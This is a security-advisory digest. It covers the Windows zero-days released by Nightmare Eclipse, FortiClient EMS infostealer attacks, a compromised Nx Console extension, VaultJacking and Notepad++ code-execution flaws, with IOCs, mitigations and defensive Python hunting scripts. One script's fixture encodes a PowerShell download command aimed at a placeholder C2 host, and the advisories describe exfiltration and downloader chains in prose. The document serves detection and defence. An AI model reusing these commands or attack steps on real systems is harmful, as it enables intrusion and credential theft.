Disgruntled 0-day Hunter 'Humiliated' by Microsoft Pledges 'Bone Shattering Drop' as Redmond Calls Cops
A dispute between Microsoft and a bug hunter known as Nightmare Eclipse (also Chaotic Eclipse) has intensified following the researcher's release of six Windows zero-day vulnerabilities: RedSun, UnDefend, BlueHammer, YellowKey, GreenPlasma, and MiniPlasma. Three of these (BlueHammer, RedSun, and UnDefend) were actively exploited shortly after Nightmare Eclipse published proof-of-concept code on GitHub and GitLab. Microsoft responded with a blog post on uncoordinated vulnerability disclosure, asserting that none of the flaws had been reported through official channels and threatening legal action via its Digital Crimes Unit, while also noting that YellowKey (CVE-2026-45585) is "more likely" to be exploited because a public PoC exists. Nightmare Eclipse claims Microsoft deleted their MSRC account, refused to communicate, and humiliated them, and has promised a "bone shattering drop" of further exploits on July 14. Experts, including systems engineer Muhammad Qasim Shahzad, noted how quickly the flaws were weaponized, causing significant damage to enterprises and shrinking the window available for patching. Dustin Childs, an expert in coordinated vulnerability disclosure, suggested Microsoft could have managed the situation more effectively, while Katie Moussouris, who pioneered Microsoft's bug bounty program, criticized Microsoft's "mixed messages" and "vaguely threatening" tone, highlighting a "David and Goliath dynamic" in which users ultimately suffer when coordination fails. Security researcher Kevin Beaumont characterized the situation as a "dumpster fire of Microsoft's own making," pointing to past inconsistencies in how Microsoft has treated researchers who publicly disclose zero-days. The incident underscores the ongoing challenges of coordinated vulnerability disclosure: researchers frequently find Microsoft difficult to work with, a problem expected to grow with the rise of AI-assisted bug discovery.
Severity: Critical
Threat Details and IOCs
| Malware: | GreenPlasma, RedSun, Trojan.Win32.GREENPLASMA.A, Trojan.Win64.GREENPLASMA.A, UnDefend |
|---|---|
| CVEs: | CVE-2026-33825, CVE-2026-41091, CVE-2026-45498, CVE-2026-45585 |
| Technologies: | Microsoft Windows, Microsoft Windows Server |
| Threat Actors: | Chaotic Eclipse, ChaoticEclipse, DeadEclipse, NightmareEclipse |
| Attacker Countries: | Russia, Singapore, Switzerland |
| Victim Industries: | Energy, Financial Services, Government, Military, Telecommunications |
| Victim Countries: | United States |
Mitigation Advice
- Prioritize and immediately deploy the security update that patches the actively exploited BlueHammer vulnerability (CVE-2026-33825) across all Windows endpoints and servers.
- Apply Microsoft's recommended mitigation for the YellowKey BitLocker bypass (CVE-2026-45585) by removing the `autofstx.exe` entry from the `BootExecute` registry value within the Windows Recovery Environment (WinRE) image on all affected Windows 11 and Server 2025 systems.
- Initiate a threat hunt across all endpoints for file-based indicators of compromise related to the RedSun and UnDefend vulnerabilities, specifically searching for `RedSun.exe` and `UnDefend.exe` in user directories and temporary folders.
- Configure your SIEM or monitoring tools to generate a high-priority alert when the Microsoft Defender Antivirus Service (`MsMpEng.exe`) fails to start, stops unexpectedly, or fails to load its engine, as this is a key indicator of the UnDefend vulnerability.
- Implement a detection rule in your EDR or SIEM to alert on the use of the Cloud Files API, specifically `CfRegisterSyncRoot` or `CfAbortHydration`, originating from processes that are not legitimate cloud sync clients like OneDrive or Dropbox.
- Schedule security operations staff to be on high alert on and immediately following July 14th, and prepare incident response playbooks for a potential widespread Windows zero-day event.
Compliance Best Practices
- Review and re-architect the entire vulnerability management program to reduce the mean time to patch for critical vulnerabilities, aiming for deployment within 72 hours of patch release instead of relying on a monthly cycle.
- Initiate a phased project to enforce the Principle of Least Privilege (PoLP) by removing local administrator rights from all standard user accounts and migrating to a just-in-time (JIT) access solution for administrative tasks.
- Update the corporate device configuration policy to mandate the use of multi-factor authentication for BitLocker, such as TPM+PIN, on all company laptops to mitigate physical access vulnerabilities.
- Establish and enforce a mandatory baseline configuration for all endpoint BIOS/UEFI settings, including enabling secure boot, setting a firmware password, and locking the boot order to prevent booting from unauthorized devices.
- Tune your Endpoint Detection and Response (EDR) platform to create behavioral analytics rules that alert on sequences of suspicious activity, such as a non-system process enumerating Volume Shadow Copies (VSS) followed by the creation of an NTFS junction point, which is indicative of LPE techniques.
- Conduct a tabletop exercise for the Incident Response team using a scenario involving a publicly disclosed, unpatched, and actively exploited vulnerability in a core enterprise application like Windows.
Threat Actors Exploit Critical FortiClient EMS Flaw to Deploy Credential Stealer
Threat actors are actively exploiting CVE-2026-35616, a critical pre-authentication API access bypass (CVSS 9.1) in FortiClient Endpoint Management Server (EMS), to deploy credential-stealing malware. The vulnerability, patched in FortiClient EMS 7.4.7 and later, allows attackers to escalate privileges and modify EMS configurations. Observed in May 2026, the campaign leverages the EMS's own management pathway to push malicious PowerShell commands to managed endpoints, disguised as legitimate operations. Attackers modify configurations to defer firmware upgrades and alter endpoint policies, inserting a script that uses the legitimate `fortitray.exe` to execute a .cmd file. This .cmd file in turn invokes a Base64-encoded PowerShell script that downloads and runs `FortiEndpoint_Patch.exe`, an information stealer. The stealer, masquerading as an update, harvests sensitive data such as passwords, cookies, and autofill details from Chromium- and Gecko-based browsers and saves them to a log file in the ProgramData directory. The PowerShell script then exfiltrates the captured data to the attacker-controlled IP address 83.138.53[.]110 via an HTTP POST request, potentially enabling further access to cloud services and internal applications through reuse of the stolen session cookies and credentials.
Severity: Critical
Threat Details and IOCs
| Malware: | EKZ, EKZ Infostealer |
|---|---|
| CVEs: | CVE-2026-21643, CVE-2026-35616 |
| Technologies: | Fortinet FortiClient, Fortinet FortiClient EMS, Fortinet FortiGate, Gecko, Google Chrome, Microsoft Windows, Microsoft Windows Server, Mozilla Firefox |
| Threat Actors: | Medusa |
| Attacker IPs: | 185[.]220[.]101[.]15, 192[.]42[.]116[.]14, 83[.]138[.]53[.]110 |
| Attacker URLs: | hxxp[:]//83.138.53.110/dl/p.exe, hxxp[:]//83.138.53.110/service/save.php |
| Attacker Hashes: | 0da123adf9251957a4b850a3f6bd6a753dd4892be176a84a18450e899534cc5e, 17e771c78430cc67e71d4547f8996a1a488e9d3f, 2927bc31b4f8254c6b332fc03110a6373cad00ffa2ff9de427c26bb222017bb2, 2f25ea1b622abf3212141af932c2ec4cbd6b2b5903c2a531121f691227d98cff, 338662fd0c4d750a0ba203a32b59f081, d91c00fad521e76efa89715cca89db487d5676f2c767c883482f9c8f82bd383a, fd65051c61a904a304919c04a8c8633c001183ac73ac461cd4d9057946f02bf5 |
| Victim Industries: | Education, Financial Services, Hospitality, Multimedia, Pharmaceuticals, Retail, Utilities |
| Victim Countries: | United States |
Mitigation Advice
- Immediately patch all FortiClient Endpoint Management Server (EMS) instances to version 7.4.7 or later to mitigate CVE-2026-35616.
- Block all outbound traffic to the IP address 83.138.53[.]110 at the network firewall to prevent data exfiltration.
- Use your Endpoint Detection and Response (EDR) tool or other endpoint search capabilities to scan all systems for the presence of the file "FortiEndpoint_Patch.exe".
- Query security information and event management (SIEM) and EDR logs for instances where the process `fortitray.exe` is the parent process of `cmd.exe`, which in turn launches `powershell.exe`.
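The parent-process hunt above, as an added example that is not part of the advisory: it walks constructed Sysmon-style process-creation records (field names `pid`, `ppid`, `image`, `cmdline` are an assumption; map your EDR or SIEM export to them), flags any `powershell.exe` whose ancestry is `fortitray.exe` -> `cmd.exe` -> `powershell.exe`, and decodes a `-EncodedCommand` payload so the analyst can see what the PowerShell stage was asked to do. The C2 hostname in the sample is a placeholder.

```python
"""Hunt for the fortitray.exe -> cmd.exe -> powershell.exe chain in process-creation logs.

Added example, not code from the advisory. Records are constructed here as
Sysmon-style dicts (pid, ppid, image, cmdline); map your EDR/SIEM export to the
same fields. Any -EncodedCommand payload on the leaf process is decoded as well.
"""
import base64
import re
from typing import Dict, List, Optional

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample telemetry (not real events); the C2 hostname is a placeholder.
_ENC = base64.b64encode(
    "Invoke-WebRequest http://c2.example.invalid/patch.exe".encode("utf-16-le")).decode()
SAMPLE_EVENTS: List[Dict] = [
    {"pid": 4100, "ppid": 900, "image": r"C:\Program Files\Fortinet\FortiClient\fortitray.exe",
     "cmdline": "fortitray.exe"},
    {"pid": 4120, "ppid": 4100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c C:\ProgramData\update.cmd"},
    {"pid": 4150, "ppid": 4120, "image": PS,
     "cmdline": "powershell.exe -nop -w hidden -EncodedCommand " + _ENC},
    # Benign: an administrator opening cmd from Explorer and running PowerShell.
    {"pid": 5000, "ppid": 700, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"pid": 5010, "ppid": 5000, "image": PS, "cmdline": "powershell.exe Get-Process"},
]
# Ancestry to alert on, root first, per the advisory's hunting guidance.
CHAIN = ("fortitray.exe", "cmd.exe", "powershell.exe")
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def find_chains(events: List[Dict], chain=CHAIN) -> List[Dict]:
    """Return one hit per process whose ancestry, leaf upward, matches `chain`."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if basename(e["image"]) != chain[-1]:
            continue
        lineage, cur = [], e
        while cur is not None and len(lineage) < len(chain):
            lineage.append(basename(cur["image"]))
            cur = by_pid.get(cur["ppid"])  # parent may be missing (rotated logs)
        if tuple(reversed(lineage)) == tuple(chain):
            hits.append({"pid": e["pid"], "chain": " -> ".join(chain),
                         "decoded": decode_encoded_command(e["cmdline"])})
    return hits


if __name__ == "__main__":
    for hit in find_chains(SAMPLE_EVENTS):
        print(f"ALERT pid={hit['pid']} {hit['chain']} decoded={hit['decoded']!r}")
```

PID reuse across a long capture can produce false ancestry; correlate on process GUIDs where your telemetry provides them.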
Compliance Best Practices
- Implement enhanced PowerShell logging, including Script Block Logging and Module Logging, and forward these logs to your SIEM for analysis and alerting on suspicious activity.
- Develop and deploy an application allowlisting policy using a tool like Windows Defender Application Control or a third-party solution to prevent unauthorized executables from running on endpoints.
- Implement network segmentation to place critical infrastructure like the FortiClient EMS server into a secure management VLAN with strict firewall rules, limiting inbound access to only authorized administrative workstations.
- Implement a corporate policy and use Group Policy Objects (GPOs) to disable the password-saving feature in all company-supported web browsers to minimize the impact of credential theft malware.
https://cyberpress.org/forticlient-flaw-exploited/
https://gbhackers.com/forticlient-code-execution-flaw/
https://thehackernews.com/2026/05/threat-actors-exploit-critical.html
https://www.hendryadrian.com/hackers-exploit-forticlient-ems-flaw-to-push-infostealer-malware/
https://www.securityweek.com/critical-forticlient-ems-vulnerability-exploited-in-fresh-attacks/
CVE-2026-48027: Compromised Nx Console Version 18.95.0
CVE-2026-48027 details a critical supply chain compromise affecting Nx Console version 18.95.0, a VS Code extension (nrwl.angular-console), which was maliciously published on May 19, 2026. This compromised version was available for approximately 18 minutes on the Visual Studio Marketplace and 36 minutes on OpenVSX. Rated with a CVSS v3 score of 9.8, this vulnerability is actively exploited and listed in the CISA Known Exploited Vulnerabilities catalog. The malicious extension functions as a multi-stage credential stealer and supply chain poisoning tool, designed to harvest tokens and secrets from platforms such as GitHub, npm, AWS, HashiCorp Vault, Kubernetes, and 1Password, exfiltrating data via HTTPS, GitHub API, and DNS tunneling. It also establishes a persistent Python backdoor on macOS at `~/.local/share/kitty/cat.py`. Although the extension has over 2.2 million installations, internal analytics suggest thousands of users, potentially over 6,000, were affected, with GitHub reporting the exfiltration of approximately 3,800 internal source code repositories due to this compromise. Remediation requires upgrading to Nx Console version 18.100.0 or later and rotating all credentials accessible from any workstation that ran the compromised version. Specific indicators of compromise include the malicious VSIX SHA-256: `1A4AFCE34918BDC74AE3F31EDAFFFFAA0EE074D83618F53EDFD88137927340B8`, malicious `main.js` SHA-256: `B0CEFB66B953E5184B6ADB3035E9E267335AC5EABFE1848E07834777B9397B74`, obfuscated payload `index.js` SHA-256: `E7347D90653EFC565F03733A95E9209D78F9CFA81E31FF2B2DD9D48D75A4B8B1`, dropper `package.json` SHA-256: `43F2B001846C4966073EBFFA5BE8F15E491A1E7D32BBD805D57406FF540E0DD9`, and C2 Client `cat.py` SHA-256: `FB5C97557230A27460FDAB01FAFCFABEAA49590BAFD5B6EF30501AA9E0A51142`.
Severity: Critical
Threat Details and IOCs
| Malware: | Megalodon, Mini Shai-Hulud, Shai-Hulud, Shai-Hulud 2.0 |
|---|---|
| CVEs: | CVE-2026-48027 |
| Technologies: | 1Password, Amazon Web Services, Apple macOS, Atlassian Bitbucket, Docker, Eclipse Foundation Open VSX Registry, GitHub, GitLab, Google Cloud Platform, HashiCorp Terraform, HashiCorp Vault, Kubernetes, Linux, Microsoft Entra ID, Microsoft Visual Studio, Microsoft Visual Studio Code Marketplace, Microsoft Windows, npm, Nrwl Nx, Nx Console, PyPI, Python |
| Threat Actors: | DeadCatx3, Lapsus, LAPSUS$, PCPcat, ShellForce, TeamPCP, UNC6780 |
| Attacker Countries: | Brazil, United Kingdom |
| Attacker IPs: | 216[.]126[.]225[.]129, 83[.]142[.]209[.]194 |
| Attacker Emails: | claude@users[.]noreply[.]github[.]com |
| Attacker Domains: | getsession[.]org |
| Attacker URLs: | api[.]github[.]com/search/commits?q=firedalazer |
| Attacker Hashes: | 1a4afce34918bdc74ae3f31edaffffaa0ee074d83618f53edfd88137927340b8, 43f2b001846c4966073ebffa5be8f15e491a1e7d32bbd805d57406ff540e0dd9, 558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2, 9d88f040c44b5f4d5f9db15ff89310776c168e99, ab4fcadaec49c03278063dd269ea5eef82d24f2124a8e15d7b90f2fa8601266c, acfc3f957a63b4cde93ff645f2b6bf26a8ed1bbf, b0cefb66b953e5184b6adb3035e9e267335ac5eabfe1848e07834777b9397b74, ba642fe2c7c65e42dd7f6444b83023dc6827e08c, e7347d90653efc565f03733a95e9209d78f9cfa81e31ff2b2dd9d48d75a4b8b1, fb5c97557230a27460fdab01fafcfabeaa49590bafd5b6ef30501aa9e0a51142 |
| Victim Industries: | Information Technology, Software, Technology Hardware |
| Victim Countries: | United States |
Mitigation Advice
- Scan all developer workstations to identify installations of the Nx Console Visual Studio Code extension, specifically version 18.95.0.
- For any machine with Nx Console version 18.95.0, immediately upgrade the extension to version 18.100.0 or a later, safe version.
- Use endpoint security tools to scan all developer workstations for files matching the SHA-256 hashes associated with CVE-2026-48027.
- On all macOS developer workstations, check for the existence of the file at the path `~/.local/share/kitty/cat.py`.
- For any user whose machine is identified as compromised, immediately revoke all active sessions and rotate their GitHub credentials, including personal access tokens.
- For any user whose machine is identified as compromised, immediately revoke and rotate their npm access tokens.
- For any user whose machine is identified as compromised, immediately disable and rotate all their AWS IAM user credentials and access keys.
- For any user whose machine is identified as compromised, immediately revoke their HashiCorp Vault tokens and credentials.
- For any user whose machine is identified as compromised, immediately revoke their Kubernetes access tokens and rotate any associated kubeconfig credentials.
- For any user whose machine is identified as compromised, immediately initiate a master password reset for their 1Password account and audit all stored credentials for unauthorized access or use.
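A workstation sweep covering the first four steps above, as an added example that is not code from the Nx project or the advisory: it assumes the usual extensions layout of `<root>/<publisher>.<name>-<version>/package.json` (for example `~/.vscode/extensions`), flags the 18.95.0 build, hashes files inside each extension against the SHA-256 indicators listed for CVE-2026-48027, and checks for the macOS persistence path. The `demo()` tree is constructed in a temporary directory.

```python
"""Sweep a VS Code extensions directory for the compromised Nx Console build (CVE-2026-48027).

Added example, not code from the Nx project or the advisory. It assumes the
standard layout <extensions root>/<publisher>.<name>-<version>/package.json
and matches files inside each extension against the advisory's SHA-256 IOCs.
"""
import hashlib
import json
import tempfile
from pathlib import Path
from typing import Dict, List

# (publisher, name) -> known-bad version, per the advisory.
COMPROMISED = {("nrwl", "angular-console"): "18.95.0"}
# SHA-256 indicators from the advisory, lowercased.
IOC_SHA256 = {
    "1a4afce34918bdc74ae3f31edaffffaa0ee074d83618f53edfd88137927340b8": "malicious VSIX",
    "b0cefb66b953e5184b6adb3035e9e267335ac5eabfe1848e07834777b9397b74": "malicious main.js",
    "e7347d90653efc565f03733a95e9209d78f9cfa81e31ff2b2dd9d48d75a4b8b1": "obfuscated payload index.js",
    "43f2b001846c4966073ebffa5be8f15e491a1e7d32bbd805d57406ff540e0dd9": "dropper package.json",
    "fb5c97557230a27460fdab01fafcfabeaa49590bafd5b6ef30501aa9e0a51142": "C2 client cat.py",
}
# macOS persistence location named in the advisory.
BACKDOOR_PATH = Path.home() / ".local" / "share" / "kitty" / "cat.py"


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_extensions(ext_root: Path) -> List[Dict[str, str]]:
    """Flag the known-bad version and any file whose hash matches an IOC."""
    findings: List[Dict[str, str]] = []
    for pkg in sorted(ext_root.glob("*/package.json")):
        try:
            meta = json.loads(pkg.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable manifest; nothing to judge from it here
        key = (str(meta.get("publisher", "")).lower(), str(meta.get("name", "")).lower())
        if COMPROMISED.get(key) == str(meta.get("version")):
            findings.append({"type": "compromised-version", "path": str(pkg.parent),
                             "detail": f"{key[0]}.{key[1]} {meta['version']}"})
        for f in pkg.parent.rglob("*"):
            if f.is_file() and f.suffix in {".js", ".json", ".py", ".vsix"}:
                tag = IOC_SHA256.get(sha256_of(f))
                if tag:
                    findings.append({"type": "ioc-hash", "path": str(f), "detail": tag})
    return findings


def backdoor_present(path: Path = BACKDOOR_PATH) -> bool:
    """True if the macOS persistence file from the advisory exists."""
    return path.is_file()


def demo() -> List[Dict[str, str]]:
    """Build a constructed extensions tree (one bad, one fixed version) and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for version in ("18.95.0", "18.100.0"):
            ext = root / f"nrwl.angular-console-{version}"
            ext.mkdir()
            (ext / "package.json").write_text(json.dumps(
                {"publisher": "nrwl", "name": "angular-console", "version": version}))
        return scan_extensions(root)
```

Run `scan_extensions(Path.home() / ".vscode" / "extensions")` on a real workstation; a compromised-version hit is a rotation trigger for every credential the machine could reach, regardless of whether a hash also matched.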
Compliance Best Practices
- Develop and implement a policy to restrict the installation of Visual Studio Code extensions to a pre-approved allowlist managed by the security and development teams.
- Enhance network security monitoring to detect and alert on DNS tunneling activity from developer workstations.
- Implement and maintain strict egress filtering rules on the network perimeter to block outbound traffic from developer workstations to all but essential, allow-listed destinations.
- Deploy and configure an Endpoint Detection and Response (EDR) solution on all developer workstations to monitor for and block suspicious file creation, process execution, and network connections.
- Establish a recurring program to review and enforce the principle of least privilege for all developer accounts and service principals across critical systems, including GitHub, AWS, and Kubernetes.
- Implement a mandatory security awareness training program for all developers that specifically covers the risks of software supply chain attacks via IDE extensions, third-party libraries, and other development tools.
VaultJacking Attack Exposes Google Password Vaults via Single PIN
A newly identified phishing technique, "VaultJacking," demonstrates how a single compromised Google Password Manager (GPM) PIN can expose a user's entire credential vault, including passkeys. On Android devices, GPM relies on the device's screen lock (PIN, pattern, or password) for access, so an attacker who bypasses that lock gains full access to every stored password and passkey. While Google states that screen lock PINs are not stored by Google and that verification occurs in secure hardware enclaves with guess limits, the security of the password vault is in practice no stronger than the security of the associated Google Account. To mitigate this risk, users must enable strong Multi-Factor Authentication (MFA) for their Google Account, use a robust and unique Google Account password, and, crucially, enable the Sync Passphrase, which adds a layer of encryption that prevents even Google from accessing password data. Strengthening the device's screen lock and maintaining general device security are essential preventative measures as well.
Severity: Critical
Threat Details and IOCs
| Technologies: | Google Account, Google Android, Google Chrome, Google Password Manager |
|---|---|
| Victim Industries: | Financial Services, Technology Hardware |
Mitigation Advice
- Instruct all employees to immediately enable a strong, unique Sync Passphrase on their corporate Google Accounts to encrypt their synced data, including passwords.
- Audit all corporate Google Workspace accounts to ensure Multi-Factor Authentication (MFA) is enabled and enforced, prioritizing phishing-resistant methods like hardware security keys or authenticator apps.
- Enforce a policy requiring complex screen locks (e.g., long PINs or alphanumeric passwords instead of simple patterns) on all mobile devices with access to corporate data.
- Send a security bulletin to all employees explaining the 'VaultJacking' threat, and provide clear, step-by-step instructions on how to set a strong device screen lock and enable the Google Sync Passphrase.
Compliance Best Practices
- Implement a Mobile Device Management (MDM) or Unified Endpoint Management (UEM) solution to centrally enforce security policies, such as complex passcodes, encryption, and application controls on all mobile endpoints.
- Evaluate and standardize on an enterprise-grade password manager that is independent of the browser or operating system account and offers its own master password and multi-factor authentication.
- Develop a recurring security awareness training program that includes modules on mobile device security, phishing attack identification, and the importance of using unique credentials for different services.
Architectural Vulnerabilities in Notepad++: Arbitrary Code Execution Risks Unmasked
Multiple critical vulnerabilities have been identified in Notepad++, a widely used text editor, with one flaw enabling arbitrary code execution through native software features. A hotfix, Notepad++ 8.9.6.1, has been released to address three distinct vulnerabilities: CVE-2026-48770, CVE-2026-48778, and CVE-2026-48800. The most severe, CVE-2026-48778, carries a CVSS score of 7.8 and allows arbitrary code execution due to unsafe parsing of the `commandLineInterpreter` parameter within the `config.xml` file. This flaw, classified as CWE-78 (OS command injection), can be exploited when a user triggers the "Open Containing Folder in cmd" function, executing an attacker-controlled binary without prior sanitization. Exploitation vectors include overwriting `config.xml` in the local AppData directory, using malicious shortcuts with the `-settingsDir` parameter, cloud synchronization directory poisoning, and weaponized archives distributed via social engineering. This vulnerability requires no elevated privileges and has low exploitation complexity. Additionally, CVE-2026-48770 causes application instability and denial-of-service when processing malformed data, while CVE-2026-48800 permits separate code execution through flawed parsing of the `shortcuts.xml` document. Users are urged to update to Notepad++ 8.9.6.1 immediately, and administrators should monitor configuration adjustments and restrict write permissions on sensitive Windows directories.
Severity: Critical
Threat Details and IOCs
| CVEs: | CVE-2026-48770, CVE-2026-48778, CVE-2026-48800 |
|---|---|
| Technologies: | Microsoft Windows, Notepad++ |
Mitigation Advice
- Update all instances of Notepad++ to version 8.9.6.1 or newer on all company endpoints.
- Use asset inventory or endpoint detection and response (EDR) tools to generate a report of all systems with any version of Notepad++ installed.
- Using your SIEM or EDR, search for recent or anomalous modifications to `config.xml` and `shortcuts.xml` files located in Notepad++ AppData directories (e.g., `%APPDATA%\Notepad++`).
- Create a detection rule in your EDR to alert on `notepad++.exe` launching any child process that is not a standard, expected command-line interpreter (e.g., `cmd.exe`, `powershell.exe`).
- Scan endpoints for shortcut files (.lnk) that launch Notepad++ with the `-settingsDir` command-line parameter pointing to an unusual or network-based directory.
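A configuration audit that complements the `config.xml` hunt above, as an added example that is not Notepad++ project code: it reads the `commandLineInterpreter` entry and classifies it as ok, suspicious, or missing, accepting only a bare interpreter name or an absolute path under a trusted system directory. It assumes the setting is stored as `<GUIConfig name="commandLineInterpreter">cmd</GUIConfig>` inside `<GUIConfigs>`, which is the layout of current Notepad++ config files; the two sample XML documents are constructed.

```python
"""Audit a Notepad++ config.xml for a tampered commandLineInterpreter value (CVE-2026-48778).

Added example, not Notepad++ project code. It assumes the setting is stored as
<GUIConfig name="commandLineInterpreter">cmd</GUIConfig> inside <GUIConfigs>;
the sample XML below is constructed for the demonstration.
"""
import os
import xml.etree.ElementTree as ET
from pathlib import Path
from typing import Dict, Optional

# Binaries that "Open Containing Folder in cmd" is expected to launch.
EXPECTED = {"cmd", "cmd.exe", "powershell", "powershell.exe", "pwsh", "pwsh.exe"}
# Absolute paths are accepted only from these directories (lowercased, trailing slash).
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\program files\\powershell\\")

CLEAN_CONFIG = """<NotepadPlus><GUIConfigs>
  <GUIConfig name="commandLineInterpreter">cmd</GUIConfig>
</GUIConfigs></NotepadPlus>"""
TAMPERED_CONFIG = """<NotepadPlus><GUIConfigs>
  <GUIConfig name="commandLineInterpreter">C:\\Users\\alice\\AppData\\Local\\Temp\\updater.exe</GUIConfig>
</GUIConfigs></NotepadPlus>"""


def interpreter_from_config(xml_text: str) -> Optional[str]:
    """Return the configured interpreter string, or None if the entry is absent."""
    for node in ET.fromstring(xml_text).iter("GUIConfig"):
        if node.get("name") == "commandLineInterpreter":
            return (node.text or "").strip()
    return None


def assess_interpreter(value: Optional[str]) -> Dict[str, str]:
    """Classify the value as ok, suspicious, or missing (anything unusual is flagged for review)."""
    if value is None:
        return {"verdict": "missing", "reason": "no commandLineInterpreter entry"}
    v = value.strip().strip('"').lower()
    name = v.replace("/", "\\").rsplit("\\", 1)[-1]
    if v in EXPECTED:
        return {"verdict": "ok", "reason": "bare interpreter name"}
    if name in EXPECTED and v.startswith(TRUSTED_DIRS):
        return {"verdict": "ok", "reason": "absolute path under a trusted directory"}
    if name not in EXPECTED:
        return {"verdict": "suspicious", "reason": f"unexpected binary {name!r}"}
    return {"verdict": "suspicious", "reason": f"interpreter outside trusted directories: {value!r}"}


def audit_config_file(path: Path) -> Dict[str, str]:
    """Read config.xml from disk; parse or I/O failures are reported, not raised."""
    try:
        return assess_interpreter(interpreter_from_config(path.read_text(encoding="utf-8")))
    except (OSError, ET.ParseError) as exc:
        return {"verdict": "error", "reason": str(exc)}


if __name__ == "__main__":
    print("clean sample:   ", assess_interpreter(interpreter_from_config(CLEAN_CONFIG)))
    print("tampered sample:", assess_interpreter(interpreter_from_config(TAMPERED_CONFIG)))
    local = Path(os.environ.get("APPDATA", "")) / "Notepad++" / "config.xml"
    print("this machine:   ", audit_config_file(local))
```

Point `audit_config_file` at every user profile's `%APPDATA%\Notepad++\config.xml` (and at any directory named by a `-settingsDir` shortcut) to cover the vectors the advisory lists.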
Compliance Best Practices
- Implement an application control solution, such as Windows Defender Application Control or AppLocker, to prevent executables from running in user-writable locations like the AppData directory.
- Enforce a principle of least privilege by ensuring standard user accounts do not have administrative rights and cannot write to sensitive application or system directories.
- Establish a formal vulnerability management program that includes automated software inventory, risk-based prioritization, and defined service-level agreements (SLAs) for patching third-party applications.
- Develop and conduct regular security awareness training that educates employees on identifying and reporting social engineering attempts, particularly those involving suspicious file downloads or email attachments.
- Implement a File Integrity Monitoring (FIM) tool to create baselines and alert on unauthorized changes to critical configuration files for widely used applications.